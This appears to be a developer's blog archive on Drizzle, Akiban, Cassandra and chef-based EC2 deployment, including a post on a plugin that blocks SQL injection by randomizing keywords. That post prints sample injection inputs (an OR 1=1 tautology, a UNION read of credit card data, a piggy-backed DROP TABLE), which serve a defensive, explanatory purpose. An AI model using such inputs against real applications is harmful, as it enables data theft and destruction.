MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the node_comment_statistics table by performing an index lookup using its primary key.

Akiban Execution Plan

The tables involved in the query fall into a single table group in Akiban - the node group. Grouping is explained by our CTO in this post and that post includes a grouping for Drupal where you can see the node group. For this query, it means all joins within the node group are executed with essentially zero cost. It also allows for the creation of Akiban group indexes. A group index is an index that can span multiple tables along a single branch within a table group.

A covering group index for this query is:

CREATE INDEX cvr_gi ON node
(
  node.status,
  node.comment,
  node.created,
  node.nid,
  node_comment_statistics.comment_count,
  node_comment_statistics.nid,
  node.title
) USING LEFT JOIN

Notice that the node.created column is included in this index so a sort could be avoided.

The other large advantage Akiban brings when executing this query is the query optimizer is intelligent enough to determine that the DISTINCT is not required in the query due to the 1-to-1 mapping between node and node_comment_statistics and the fact that an INNER JOIN is being performed between these 2 tables.
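To make the DISTINCT argument concrete, here is a small sketch using Python's built-in sqlite3 module rather than Akiban or MySQL. The trimmed-down table definitions and the sample rows are assumptions made up for illustration, and node.nid is added to the ORDER BY only to make the row order deterministic. Because nid is the primary key of both tables and appears in the select list, the inner join cannot produce duplicate rows, so the query returns the same result with and without DISTINCT.

```python
import sqlite3

# Toy schema: only the columns the query touches (an assumption, not Drupal's full schema).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE node (
    nid INTEGER PRIMARY KEY, title TEXT, status INTEGER,
    comment INTEGER, created INTEGER);
CREATE TABLE node_comment_statistics (
    nid INTEGER PRIMARY KEY REFERENCES node(nid), comment_count INTEGER);
""")

# Made-up rows; two nodes deliberately share a title and a created timestamp.
conn.executemany(
    "INSERT INTO node VALUES (?, ?, ?, ?, ?)",
    [(111, "a", 1, 2, 1000), (112, "a", 1, 2, 1000), (113, "b", 1, 2, 1001)],
)
conn.executemany(
    "INSERT INTO node_comment_statistics VALUES (?, ?)",
    [(111, 3), (112, 3), (113, 5)],
)

QUERY = """
SELECT {distinct} node.title, node.nid,
       node_comment_statistics.comment_count, node.created
FROM node
INNER JOIN node_comment_statistics
        ON node.nid = node_comment_statistics.nid
WHERE node.status = 1
  AND node.comment IN (2)
  AND node.nid >= 111
  AND node_comment_statistics.comment_count >= 2
ORDER BY node.created ASC, node.nid ASC
LIMIT 50 OFFSET 0
"""

with_distinct = conn.execute(QUERY.format(distinct="DISTINCT")).fetchall()
without_distinct = conn.execute(QUERY.format(distinct="")).fetchall()
```

On this toy data both result lists are identical, which is the property the optimizer relies on when it drops the DISTINCT.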

Limit_Default(limit=50: project([Field(6), Field(3), Field(4), Field(2)]))
  project([Field(6), Field(3), Field(4), Field(2)])
    Select_HKeyOrdered(Index(cvr_gi(BoolLogic(AND -> Field(3) >= Literal(111), Field(4) >= Literal(2) -> BOOL))
      IndexScan_Default(Index(cvr_gi(>=UnboundExpressions[Literal(1), Literal(2)],<=UnboundExpressions[Literal(1), Literal(2)]))

The above execution plan is in the Akiban format. In this format, you read the plan like a tree so we start from the leaf nodes. The above plan starts with a scan of the cvr_gi index using the node.status and node.comment predicates. It then filters rows from this scan (the Select_HKeyOrdered operator performs this filtering) before limiting the results to the size of the result set requested.
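The bottom-up reading of the plan can be sketched in a few lines of Python. This is only an illustration of the three stages, not how the Akiban Server is implemented: the toy rows, the function names and the use of a sorted list as the index are all assumptions. The field positions appear to follow the column order of cvr_gi, so Field(2) is node.created, Field(3) is node.nid, Field(4) is comment_count and Field(6) is node.title.

```python
from bisect import bisect_left, bisect_right
from itertools import islice

# Made-up index entries in cvr_gi column order:
# (status, comment, created, nid, comment_count, ncs_nid, title)
rows = [
    (1, 2, 1000, 110, 5, 110, "nid too low"),
    (1, 2, 1001, 111, 1, 111, "too few comments"),
    (1, 2, 1003, 113, 4, 113, "second match"),
    (1, 2, 1002, 112, 2, 112, "first match"),
    (0, 2, 1004, 114, 9, 114, "unpublished"),
    (1, 1, 1005, 115, 9, 115, "different comment setting"),
]
index = sorted(rows)  # an index keeps its entries in key order


def index_scan(index, status, comment):
    """Leaf of the plan: range scan on the (status, comment) prefix."""
    prefixes = [entry[:2] for entry in index]
    lo = bisect_left(prefixes, (status, comment))
    hi = bisect_right(prefixes, (status, comment))
    yield from index[lo:hi]


def select(entries):
    """Filter step: nid >= 111 and comment_count >= 2."""
    for entry in entries:
        if entry[3] >= 111 and entry[4] >= 2:
            yield entry


def project(entries):
    """Keep title, nid, comment_count and created, in that order."""
    for entry in entries:
        yield (entry[6], entry[3], entry[4], entry[2])


def run_query(index, limit=50):
    """Root of the plan: stop after `limit` rows."""
    plan = project(select(index_scan(index, status=1, comment=2)))
    return list(islice(plan, limit))


result = run_query(index)
```

Within the scanned range the entries are already ordered by created, because created is the next column in the index after the two equality columns. That is why no separate sort step is needed in this sketch.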

Conclusion

To wrap up, I briefly showed some of the performance benefits we are seeing when running Drupal 7 on the Akiban Server. In the not too distant future, we will be open sourcing our stack here at Akiban and providing downloads of the Akiban Server. I will also be making the database driver for the Akiban Server for Drupal 7 available for download on drupal.org once it's complete.

If you are interested in trying this out yourself or want to verify the results before this work becomes publicly available, feel free to contact me and I should be able to set you up with access to an EC2 instance so you can try it for yourself.

Deploy Drizzle on EC2 with chef

2011-04-07T00:00:00-07:00

This post is a tutorial on how to deploy Drizzle on an EC2 instance using chef and the Opscode Chef platform. The tutorial is specifically targeted at Ubuntu platforms. In particular, the procedures outlined here have only been tested on Ubuntu 10.04. The instructions should, however, apply to other Ubuntu versions with minimal modifications.

The Opscode Platform

In this article, we'll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to sign up for a new account. Once you are signed up, the next step is to create a new organization. For this article, I'm going to create an organization named drizzle-test. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like (you should be able to click on the image to see a larger version):

Configure AWS

An assumption made in this article is that you have an AWS account. If you don't, signing up is relatively straightforward.

A few items need to be configured for EC2 before starting with chef to make our lives easier. Amazon blocks all incoming traffic to EC2 instances by default. SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and for this article, I want to permit traffic to the drizzle port (default drizzle port is 4427) as well. This is accomplished using the AWS console. We need to configure Security Groups. You can either create a new security group or modify the default security group. For this article, I'll create a new security group named drizzle and add the appropriate rules. After creating the group and adding the rules, the security group details should look like:

I'll also create a new key pair in the AWS console specifically for this article. I'm going to give this key pair the name drizzle. After creating the key pair, I copy the downloaded private key to my SSH folder and update permissions on the key:

mv ~/Downloads/drizzle.pem ~/.ssh/
chmod 600 ~/.ssh/drizzle.pem

Install chef

Installing chef on Ubuntu is quite straightforward. Opscode maintains an APT repository which I simply need to add to my sources list. In the file /etc/apt/sources.list.d/opscode.list, add (and replace lucid with whatever release you are running):

deb http://apt.opscode.com/ lucid main

Next, I need to add the GPG key:

wget -qO - http://apt.opscode.com/packages@opscode.com.gpg.key | sudo apt-key add -
sudo apt-get update

To install chef, it's as simple as installing the chef package:

sudo apt-get install chef

When prompted for the server URL during this package installation, you can leave it blank. We will be configuring this later. You can also stop and disable the chef-client service now if you wish since we will only be using the knife utility in this article. Finally, verify the version you have installed:

knife -v

For this article, the output of the above command needs to be at least 0.9.14.

Other packages required for this article are rubygems and git:

sudo apt-get install rubygems git

Once rubygems is installed, there are a few gems required for interacting with EC2:

sudo gem install net-ssh net-ssh-multi fog highline

Configure chef

We are now all set to get started. The first thing to do is create a chef repository on your workstation. In this article, I will use git for this:

git clone https://github.com/opscode/chef-repo.git drizzle-chef-repo

Create a .chef directory within this repository. This directory contains all the configuration files for just this repository:

mkdir -p ~/drizzle-chef-repo/.chef

Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with the Opscode platform. Keys are needed for both your user and organization on the Opscode Platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and you will see a 'get private key' link on your account page:

After downloading this key, I need to place it in the configuration directory for the chef repository I am using here:

mv ~/Downloads/posulliv.pem ~/drizzle-chef-repo/.chef

For your organization, click on the 'Regenerate validation key' link and 'Generate knife config' link from the organizations overview page as mentioned in the first section of this article. After clicking those 2 links, you will have 2 files: 1) drizzle-test-validator.pem and 2) knife.rb. Move these 2 files into the configuration directory for the chef repository being used for this article:

mv ~/Downloads/drizzle-test-validator.pem ~/drizzle-chef-repo/.chef
mv ~/Downloads/knife.rb ~/drizzle-chef-repo/.chef

From now on, whenever you are in the drizzle-chef-repo directory, the knife utility will connect to the Opscode Platform. To verify this, let's list out the current clients:

posulliv@curragh:~/drizzle-chef-repo$ knife client list
[
  "drizzle-test-validator"
]
posulliv@curragh:~/drizzle-chef-repo$

We need to tell knife about our AWS credentials. This is done by adding the following 2 lines to your knife.rb file in the ~/drizzle-chef-repo/.chef directory:

knife[:aws_access_key_id]     = "Your AWS Access Key"
knife[:aws_secret_access_key] = "Your AWS Secret Access Key"

After adding these credentials I should now be able to list all the EC2 instances associated with my AWS account:

posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
posulliv@curragh:~/drizzle-chef-repo$

Drizzle Cookbook

chef should now be configured to work with your AWS account. The next step is to decide on what roles or recipes you want to apply to an instance you create. Since this article is on drizzle, I'll show how to bootstrap an EC2 instance with drizzle. I have developed a simple drizzle cookbook in a fork of Opscode's official cookbook repository that can be retrieved with git:

cd ~/drizzle-chef-repo
rm -rf cookbooks
git clone git://github.com/posulliv/cookbooks.git

I have opened a pull request for this fork to get merged into Opscode's official repository. Hopefully, it will get merged in soon.

Now we want to upload cookbooks to our chef server. The only cookbook I will upload in this article is the Drizzle cookbook:

cd ~/drizzle-chef-repo
knife cookbook upload drizzle

It is simple to list the cookbooks that have been uploaded so far to your chef server:

posulliv@curragh:~/drizzle-chef-repo$ knife cookbook list
[
  "drizzle"
]
posulliv@curragh:~/drizzle-chef-repo$

Create and Verify EC2 Instance

We are now ready to create an EC2 instance and have it bootstrap itself and install the drizzle GA release! You will see a spew of output when you issue the command below (feel free to use any AMI image or flavor you wish, I just picked one):

knife ec2 server create "recipe[drizzle]" \
--image ami-2d4aa444 \
--flavor m1.small \
--groups drizzle \
--ssh-key drizzle \
--identity-file ~/.ssh/drizzle.pem \
--ssh-user ubuntu

To verify the server is created, first we check in the server list output from EC2:

posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
i-c03b5caf       50.17.153.76     10.202.253.78    m1.small         ami-2d4aa444     drizzle          running        
posulliv@curragh:~/drizzle-chef-repo$

We should also verify that it is listed as a node:

posulliv@curragh:~/drizzle-chef-repo$ knife node list
[
  "i-c03b5caf"
]
posulliv@curragh:~/drizzle-chef-repo$

Finally, if I log onto the EC2 instance I should be able to connect to drizzle:

posulliv@curragh:~$ ssh -i ~/.ssh/drizzle.pem ubuntu@50.17.153.76
Linux ip-10-116-210-131 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 11 23:01:28 UTC 2011

  System load: 0.36             Memory usage: 13%   Processes:       55
  Usage of /:  8.6% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20110201.1'.
Last login: Mon Apr 11 22:27:04 2011 from 12.43.172.10
ubuntu@ip-10-116-210-131:~$ drizzle
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 9
Connection protocol: mysql
Server version: 2011.03.13 Ubuntu

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle>

Conclusion

Hopefully, this tutorial proves useful. I hope to work more on the Drizzle cookbook in the near future and add support for the various plugin types present in Drizzle.

Secondary Indexes with libcassandra in C++

2011-02-27T00:00:00-08:00

Last weekend I updated libcassandra, my high-level C++ client for Cassandra, to support a lot of the new features in the 0.7 Cassandra release. In particular, one of the new features is secondary indexes and I wanted to very briefly outline how secondary indexes can be used programmatically in libcassandra.

An article by Datastax gives a great overview of secondary indexes. I'm going to use the example in that article here.

The first thing which we must do is create a keyspace and column family. This is accomplished in libcassandra like:

After creating a keyspace and column family for working with, we next want to insert some sample data. I'll use the sample data inserted in the article but instead of inserting it through the CLI, I'll insert it using libcassandra:

Next, to perform the same query as was used in the article, the code looks like:

Currently, the result set is a std::map of row keys to an inner std::map of column names to column values. I plan on adding support for the result to contain more information about each row in the result set in the future.
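The shape of that result set is easy to picture with a small Python sketch. This is not libcassandra code and it does not talk to Cassandra: the row keys, column names and values are made up, and the helpers build_index and query are hypothetical names. It only illustrates the idea of a secondary index (a map from a column value to the row keys holding that value) and a result that maps row keys to an inner map of column names to column values.

```python
from collections import defaultdict

# Made-up sample rows: row key -> {column name -> column value}
users = {
    "alice": {"full_name": "Alice Example", "state": "UT", "birth_date": 1975},
    "bob": {"full_name": "Bob Example", "state": "WI", "birth_date": 1973},
    "carol": {"full_name": "Carol Example", "state": "UT", "birth_date": 1968},
}


def build_index(rows, column):
    """Map each value of `column` to the set of row keys that hold it."""
    index = defaultdict(set)
    for key, columns in rows.items():
        if column in columns:
            index[columns[column]].add(key)
    return index


def query(rows, index, value, extra=lambda columns: True):
    """Look up row keys through the index, then apply an optional extra filter."""
    return {
        key: dict(rows[key])
        for key in sorted(index.get(value, ()))
        if extra(rows[key])
    }


state_index = build_index(users, "state")
result = query(users, state_index, "UT", lambda c: c["birth_date"] > 1970)
```

Here result is a dictionary keyed by row key, with one inner dictionary of columns per matching row, which mirrors the nested std::map described above.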

SQL Injection Prevention in Drizzle

2010-12-05T00:00:00-08:00

SQL injection attacks occur frequently nowadays. While attacks of this nature are completely avoidable when safe programming techniques are used, they still occur in practice.

With this in mind, I developed a plugin for Drizzle named STAD that utilizes the query rewriting plugin interface to prevent SQL injection attacks. The target use case for this plugin is a hosted environment where applications being developed are independent of the database layer i.e. a DBA cannot control how a developer chooses to develop their application. Also, I mainly did this as a side-project to demonstrate a use-case for the query rewriting API.

Overview

STAD is a practical protection mechanism that applies the concept of instruction-set randomization to SQL: the SQL standard keywords are modified by appending a random key to them, one that an attacker cannot easily guess. Queries injected by an attacker into a randomized query will be caught since they will not contain the randomization key. The plugin will then just execute a harmless query (for now it is 'SELECT 1') instead of returning any error information to a potential attacker. The security of this approach is dependent on attackers not being able to discover the randomization key. If the key is exposed to an attacker, they will have the ability to inject SQL with the appropriate key appended to keywords.
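The randomization step can be sketched in Python. This is not the code used by the plugin or by any client driver: the keyword list is a small illustrative subset, the function name randomize is hypothetical, and the sketch assumes the key is applied to the trusted query template before any user input is substituted into it.

```python
import re

# Small illustrative subset of SQL keywords (an assumption, not the full standard list).
KEYWORDS = ("SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "DROP", "TABLE")
_KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)


def randomize(template, key):
    """Append the randomization key to every whole-word SQL keyword."""
    return _KEYWORD_RE.sub(lambda match: match.group(1) + key, template)


template = (
    "SELECT accounts FROM users "
    "WHERE login='{login}' AND pass='{password}' AND pin={pin}"
)
randomized_template = randomize(template, "1234")

# User input is spliced in after randomization, so injected keywords carry no key.
query = randomized_template.format(login="' OR 1=1 -- ", password="", pin="")
```

Anything an attacker manages to inject arrives with bare keywords, which is what lets the server side tell injected SQL apart from the SQL the application intended to send.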

This solution was first developed in the research paper 'SQLrand: Preventing SQL Injection Attacks'. In their implementation of the idea, a proxy was developed that sat between the application and the database server. Thus, while it was a database independent solution, the overhead of the proxy layer and the introduction of a new component made it impractical.

In drizzle, this functionality is enabled through the query rewriting API. When the plugin is loaded and a randomization key is specified, all queries issued against the database must contain the correct randomization key or they will not execute correctly. A version of the drizzle command line client comes with the plugin that automatically appends the correct randomization key to SQL keywords. An administrator is encouraged to use this version of the command line client whenever a randomization key is in effect.

To get an idea of how the plugin works, I created a simple diagram to illustrate the steps involved in executing a query when the plugin is enabled.

In step (1) in the diagram above, a client driver (in this case ruby which I will link to later) establishes a connection with the server and asks the STAD plugin for the current randomization key. In step (2), this key is returned to the driver (right now it is transferred as plaintext) and stored there for the duration of the connection.

In step (3), an application issues a query which goes through a client driver. This client driver randomizes the query using the randomization key obtained from the STAD plugin in step (2). It is this randomized query that is submitted to the server in step (4). Step (5) occurs before the query is parsed by the drizzle kernel. The STAD plugin de-randomizes the query and if all SQL keywords were randomized with the correct randomization key, it passes the correct query onto the drizzle query execution engine in step (6).

Steps (7) and (8) are simply the returning of a result set to the client driver and application sitting above it.

Attack Examples

In the survey paper 'A Classification of SQL Injection Attacks and Countermeasures', the authors described a number of SQL injection attack types. I'm going to go through a few of these attack types and the examples from the paper and how the STAD plugin can prevent them. For the attack types and examples that go along with them, it is assumed that the application is badly written and dynamically builds a SQL query based on user input without any validation of the input data. The query that will be constructed is:

SELECT accounts FROM users WHERE login='name' AND pass='pass' AND pin=pinno

The login, pass, and pin conditions in the WHERE clause are obtained from user input.

Tautologies

The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true. The consequences of this attack depend on how the results of the query are used within the application.

This attack type has three main goals:

bypass authentication
identify injectable parameters
extract data

An example of this attack would be:

SELECT accounts FROM users WHERE login='' OR 1=1 -- AND pass='' AND pin=

In this example, an attacker has injected a conditional (OR 1=1) that transforms the entire WHERE clause into a tautology and so every row in the users table will be returned.

This attack would be prevented using our approach. Assume for a moment that the randomization key is the string '1234'. In this case, the query issued to the drizzle server would look like:

SELECT1234 accounts FROM1234 users WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin=

In this case, the query would not be de-randomized correctly. The STAD plugin would see that the OR keyword has not been randomized with the correct randomization key. Thus, the plugin would detect spurious input and never issue this query against the database.
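The check described above can be sketched in Python. This is a simplified stand-in for what the plugin does, not its actual implementation: the keyword subset and the function name derandomize are assumptions, and the sketch flags keywords even when they appear inside string literals or comments, which a real implementation would need to handle.

```python
import re

# Small illustrative subset of SQL keywords (an assumption).
KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR", "UNION", "DROP", "TABLE"}
HARMLESS_QUERY = "SELECT 1"  # what the plugin runs instead of a rejected query


def derandomize(query, key):
    """Strip the key from keywords; fall back to a harmless query on any bare keyword."""
    if not key:
        raise ValueError("a non-empty randomization key is required")
    rejected = False

    def strip_key(match):
        nonlocal rejected
        word = match.group(0)
        if word.upper() in KEYWORDS:
            rejected = True  # keyword without the key: treat as injected
            return word
        if word.endswith(key) and word[: -len(key)].upper() in KEYWORDS:
            return word[: -len(key)]  # correctly randomized keyword
        return word  # ordinary identifier

    plain = re.sub(r"[A-Za-z_][A-Za-z0-9_]*", strip_key, query)
    return HARMLESS_QUERY if rejected else plain


legitimate = (
    "SELECT1234 accounts FROM1234 users "
    "WHERE1234 login='bob' AND1234 pass='secret' AND1234 pin=1941"
)
attack = (
    "SELECT1234 accounts FROM1234 users "
    "WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin="
)

legitimate_result = derandomize(legitimate, "1234")
attack_result = derandomize(attack, "1234")
```

The legitimate query comes back with its keywords restored, while the tautology attack is replaced by the harmless query because its OR carries no key.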

UNION Query

In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.

The goals of this attack type are:

bypass authentication
extract data

With this attack, an attacker can trick the application into returning data from a table different than the one intended by the developer.

For example, assume there is another table named creditcards in the same schema as the users table. In that case, an attacker could construct a query like:

SELECT accounts FROM users WHERE login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND pass = '' AND pin=

The original query returns an empty set but the second query returns data from the creditcards table if the given account number exists. The result of this depends on the application but it is possible an attacker could exploit this.

With our plugin, this query would look like:

SELECT1234 accounts FROM1234 users WHERE1234 login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND1234 pass = '' AND1234 pin=

As in the tautology attack, this query would never be issued since not all keywords in the query have been randomized with the correct randomization key.

Piggy-Backed Queries

Here, an attacker attempts to inject additional queries into the original query. In this case, an attacker is not trying to modify the original query; instead they are attempting to include new and distinct queries that "piggy-back" on the original query (think Little Bobby Tables).

The goals of this attack type are:

extract data
add or modify data
perform denial of service
execute remote commands

The database will receive multiple queries when an attack of this type is launched. If successful, an attacker could insert virtually any type of SQL command into the additional queries issued after the original query.

An example of this attack would be:

SELECT accounts FROM users WHERE login = 'bob' AND pass = ''; DROP TABLE users; -- ' AND pin = 1941;

The above attack has the DROP TABLE statement piggy-backed onto the original query. It would drop the users table. Our approach would prevent this attack in a similar way to the previous 2 attack types. The injected commands would not have been randomized with the correct randomization key and so would be rejected by our plugin. In this case, the first query would be issued but the DROP TABLE statement would never be executed.

Overheads of Our Approach

One question that pops up when using a plugin like this would be what kind of overheads are associated with it. One experiment I performed to measure the overhead of the plugin was to use the oltp test in sysbench at various concurrency levels with the plugin both enabled and disabled. The results for this experiment are shown below:

It's worth noting that this experiment was run on my local laptop so the actual transactions per second numbers are not interesting. All I'm looking to see is what kind of dip in transactions per second I see when the plugin is enabled. We can see that there is definitely a hit taken when the plugin is enabled with the reduction in transactions per second being about 10% across the board.

Installation and Usage

The STAD plugin is maintained on github as a purely out-of-tree drizzle plugin. To download the source, either git or wget can be used:

wget https://github.com/posulliv/stad/tarball/master
git clone git://github.com/posulliv/stad.git

To build and install the plugin, the following is performed:

./config/autorun.sh
./configure --includedir=/path/to/drizzle/root/include --with-libdrizzle-prefix=/path/to/drizzle/root --prefix=/path/to/drizzle/root
make
make install

The above assumes you have drizzle installed somewhere on your system. You just need to point the configure script to that location so it can find the header files it needs.

When starting the drizzled daemon, we need to inform it about the new plugin that we want to load since the plugin is not loaded by default. The extra parameter to pass to drizzled is --plugin-add (this loads the default list of plugins in addition to any plugins given as a parameter) so my drizzled command in my startup script looks like:

start_daemon -p "$PIDFILE" "$DAEMON --chuid $DRIZZLE_USER"  "--datadir=$DATADIR" "--plugin-add=stad"> $LOG 2>&1 &

To verify the plugin is loaded correctly, we can query the MODULES table in the DATA_DICTIONARY schema:

drizzle> select module_author, module_license, module_version
    -> from data_dictionary.modules
    -> where module_name = 'stad';
+----------------------+----------------+----------------+
| module_author        | module_license | module_version |
+----------------------+----------------+----------------+
| "Padraig O Sullivan" | GPL            | "0.2"          | 
+----------------------+----------------+----------------+
1 row in set (0 sec)

drizzle>

Once the plugin is installed, we can use a ruby client for drizzle I've been working with in my spare time. This ruby client is on github as well and it can either be retrieved using git or a tarball can be pulled:

wget https://github.com/posulliv/drizzle-ruby/tarball/master
git clone git://github.com/posulliv/drizzle-ruby.git

Then to install the client, it's simply:

sudo rake install

Once the ruby client is installed, we can begin to use it in an application. A simple example of using it is:

The above does nothing interesting but highlights a few interesting points. The client decides whether or not to use SQL randomization for a query based on the connection options given when creating a new connection to the database. Creating the connection object in the example above corresponds directly to steps (1) and (2) in the overview diagram we gave at the beginning of this article.

To issue a query that will be randomized, we must first specify a randomization key to the STAD plugin. Right now, this is done using a global variable so anyone who can connect to your drizzle database and view global variables can see what randomization key is being used. To set the randomization key to '1234', it's simply:

drizzle> set global stad_key = '1234';
Query OK, 0 rows affected (0 sec)

drizzle>

After setting the randomization key, every query that is issued against the database will now need to be randomized. This obviously becomes a problem if you need to issue queries through the command line client! The solution I use for now is to provide a version of the drizzle CLI named stadclient that takes the randomization key as a parameter. This binary will be installed in the bin directory under your drizzle root when you install the STAD plugin. We invoke it and can issue regular queries again through the CLI:

$ stadclient -k 1234

drizzle> select * from data_dictionary.global_variables where variable_name = 'stad_key'; 
+---------------+----------------+
| VARIABLE_NAME | VARIABLE_VALUE |
+---------------+----------------+
| stad_key      | 1234           | 
+---------------+----------------+
1 row in set (0 sec)

drizzle>

Getting back to the ruby client, queries are issued against drizzle and randomized automatically by the ruby client. The code to issue a query against the server is:

Line 11 in the above code encapsulates steps (3) through (7) in the overview diagram at the beginning of this article. Line 12 actually returns the results to the application and corresponds to step (8) in the diagram.

Conclusions

STAD is a practical protection mechanism against SQL injection attacks. It has relatively low overheads and when used through the ruby client interface I developed, it becomes quite simple to use in a client application with minimal modification. Of course, SQL injection attacks are completely preventable using good programming practices but I believe this plugin provides an extra layer of security in environments where a DBA cannot control how a developer chooses to sanitize their input.

Drupal 7 with Drizzle

2010-07-12T00:00:00-07:00

I wrote an article on the company blog today about how to configure the latest Drupal 7 alpha release to work with Drizzle as the backend database.

Feel free to check it out if you are interested.

Simple Drizzle Replication Plugin for Cassandra

2010-06-01T00:00:00-07:00

This week, I'm giving a talk at Open Source Bridge in Portland on developing replication plugins for Drizzle. This talk will be based on the tutorial that Jay and I gave at the MySQL User's Conference this year. What I want to cover in this article is the process of creating a simple replication plugin that simply applies the replication events that occur in Drizzle to Cassandra.
Lots of the material in this article is directly due to input from Jay and in particular from the presentation Jay put together for our tutorial in April.

Drizzle Architecture & Replication Basics

As is pretty well known at this stage, Drizzle follows a micro-kernel design. Essentially, this means that most features are built as plugins. For example, in Drizzle, authentication, logging, storage engines, etc. are provided as plugins. The kernel is meant to be extremely small in size and provides the basic functionality a database server requires such as a parser, query optimizer, and query executor.
Replication in Drizzle is entirely row-based with the kernel being the marshal of all sources and targets of replicated data. The kernel constructs objects that represent changes made in the server. The objects constructed are of type message::Transaction and the kernel pushes these constructed objects out to replication streams (a replication stream in Drizzle is a pairing of a replicator and an applier).
The Transaction message in Drizzle is the basic unit of work in the replication system which represents a set of changes that were made. We use Google Protocol Buffers for representing these messages. The GPB definition for the Transaction message is contained within the drizzled/message/transaction.proto file within the Drizzle source tree. Jay has previously gone into great detail on the GPB message definitions and I see no point in duplicating the great articles Jay has written so I encourage you to read those if you are interested in knowing more about the GPB message definitions.
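The idea of a replication stream as a replicator paired with an applier can be sketched in Python. None of the class or method names below come from Drizzle; they are hypothetical stand-ins, and the sketch assumes the simplest possible replicator, one that hands every transaction straight to its applier.

```python
class PassThroughReplicator:
    """Hypothetical replicator: forwards each transaction unchanged."""

    def replicate(self, applier, transaction):
        applier.apply(transaction)


class RecordingApplier:
    """Hypothetical applier: remembers what it was asked to apply."""

    def __init__(self):
        self.applied = []

    def apply(self, transaction):
        self.applied.append(transaction)


class ToyKernel:
    """Stand-in for the kernel: pushes each change to every registered stream."""

    def __init__(self):
        self.streams = []  # each stream is a (replicator, applier) pair

    def attach(self, replicator, applier):
        self.streams.append((replicator, applier))

    def push(self, transaction):
        for replicator, applier in self.streams:
            replicator.replicate(applier, transaction)


kernel = ToyKernel()
first, second = RecordingApplier(), RecordingApplier()
kernel.attach(PassThroughReplicator(), first)
kernel.attach(PassThroughReplicator(), second)
kernel.push({"id": 1, "statements": ["INSERT ..."]})
```

Every attached stream sees the same transaction, so adding a new target such as Cassandra only means attaching another applier.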

Creating a Simple Cassandra Applier

Mainly, what I wanted to do in this article is to go through a simple example to demonstrate the replication API. Please note that the plugin I'm going to cover for this example is extremely simple and probably not very useful. Its main purpose is to serve as an example of how to develop a transaction applier plugin that can apply transactions to a different database system; in this case Cassandra.
Our Cassandra applier depends on 2 third-party libraries: 1) thrift and 2) libcassandra. libcassandra is a C++ wrapper for the thrift interface to Cassandra that I developed a few months ago to make it easier for me to play with Cassandra when programming in C++. It's not very well tested but suits my purposes just fine.
Given that our plugin depends on some third-party libraries, my plugin.ini file will look like:

And my plugin.ac file will look like:

This takes care of my plugin's dependence on third-party libraries during the compilation process. If these libraries are not present on the system when I compile Drizzle, then this plugin will not be compiled.
As mentioned before, the plugin I am developing is a transaction applier. This means the plugin will be implementing the plugin::TransactionApplier interface. The main function a plugin implementing this interface needs to implement is the apply function.
The CassandraApplier class is declared in a new header file named cassandra_applier.h. The class declaration looks like:

The implementation is contained within the cassandra_applier.cc C++ file. The most interesting function in this file is the plugin's implementation of the apply() function. In the case of the CassandraApplier, this function looks like:

One thing worth mentioning about the above function before delving into its details is that we assume that there is 1 keyspace within Cassandra that we will be replicating into. If this keyspace is not present, the function will fail. This is mainly because this allowed me to develop this plugin pretty quickly. There is really no other reason for that. In reality, a more robust plugin would allow the keyspace to be configurable. Personally, I would prefer to have a way to specify, in the SQL statement itself, the keyspace a statement should be replicated into so it could be controlled on a per-statement basis. Not a major issue but I wanted to point this out in case anyone was wondering.
Now, the above function first looks at the Transaction message and determines how many Statement messages are contained within it. Next, we loop through all the Statement messages contained within the Transaction message. Depending on the type of the Statement message, we perform a different action. Right now, the plugin only cares about 3 types of Statements: INSERT, UPDATE, and DELETE.
